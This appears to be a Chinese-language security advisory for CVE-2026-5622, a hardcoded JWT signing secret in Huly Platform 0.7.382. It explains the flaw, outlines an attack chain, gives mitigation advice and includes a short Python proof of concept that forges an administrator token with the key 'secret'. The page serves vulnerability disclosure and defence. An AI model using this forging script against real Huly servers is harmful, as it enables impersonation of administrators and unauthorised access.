CVE-2026-5622 CVSS 3.7 低危

CVE-2026-5622 Huly Platform硬编码密钥漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5622

漏洞类型

硬编码密钥

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

hcengineering Huly Platform

漏洞概述

hcengineering Huly Platform 0.7.382版本存在安全漏洞。该漏洞位于JWT Token Handler组件的`token.ts`文件中，由于使用了硬编码的加密密钥，攻击者可远程利用此问题。尽管攻击复杂度较高，但利用该漏洞可能导致完整性受损。厂商目前尚未对此做出回应。

技术细节

该漏洞的根源位于`foundations/core/packages/token/src/token.ts`文件中。在处理JWT Token时，开发人员未使用动态生成的密钥或从安全环境变量中读取密钥，而是将参数`SERVER_SECRET`硬编码为字符串`secret`。JWT（JSON Web Token）机制通常用于在客户端和服务器之间传递身份声明，其安全性依赖于HMAC等算法对签名密钥的保密性。一旦密钥泄露或被猜测，攻击者便可以完全控制令牌的生成过程。利用此漏洞，攻击者可以构建包含恶意载荷（如提升权限、伪造用户身份）的JWT，并使用硬编码密钥进行签名。当服务器验证该令牌时，由于签名匹配，服务器会误认为该请求来自合法用户，从而允许攻击者执行未授权的操作，导致数据完整性受损。

攻击链分析

STEP 1

信息收集

攻击者识别目标运行的是hcengineering Huly Platform 0.7.382版本。

STEP 2

代码分析

攻击者获取源代码或通过公开漏洞信息得知`token.ts`中存在硬编码密钥'secret'。

STEP 3

令牌伪造

攻击者使用获取到的硬编码密钥，编写脚本生成包含恶意权限声明的JWT令牌。

STEP 4

权限提升

攻击者将伪造的令牌发送给服务器，服务器验证通过，赋予攻击者未授权的访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import jwt
import datetime

# The hardcoded secret extracted from the vulnerable source code
# File: foundations/core/packages/token/src/token.ts
HARDCODED_SECRET = "secret"

def forge_admin_token():
    # Payload simulating an administrator user
    payload = {
        "sub": "admin",
        "role": "administrator",
        "iat": datetime.datetime.utcnow(),
        "exp": datetime.datetime.utcnow() + datetime.timedelta(hours=1)
    }

    # Forge the token using the hardcoded secret
    # Algorithm is typically HS256 for this type of implementation
    forged_token = jwt.encode(payload, HARDCODED_SECRET, algorithm="HS256")

    print(f"[+] Forged JWT Token: {forged_token}")
    print(f"[+] Use this token in the Authorization header to impersonate admin.")

if __name__ == "__main__":
    forge_admin_token()

影响范围

hcengineering Huly Platform 0.7.382

防御指南

临时缓解措施

建议立即检查`foundations/core/packages/token/src/token.ts`文件，将硬编码的`SERVER_SECRET`替换为高强度的随机字符串，并将其存储在服务器环境变量中。重启服务以生效。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5622
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5622
3 Details https://www.cvedetails.com/cve/CVE-2026-5622/
4 VulDB https://vuldb.com/cve/CVE-2026-5622
5 Link https://vuldb.com/submit/785631
6 Link https://vuldb.com/vuln/355412
7 Link https://vuldb.com/vuln/355412/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表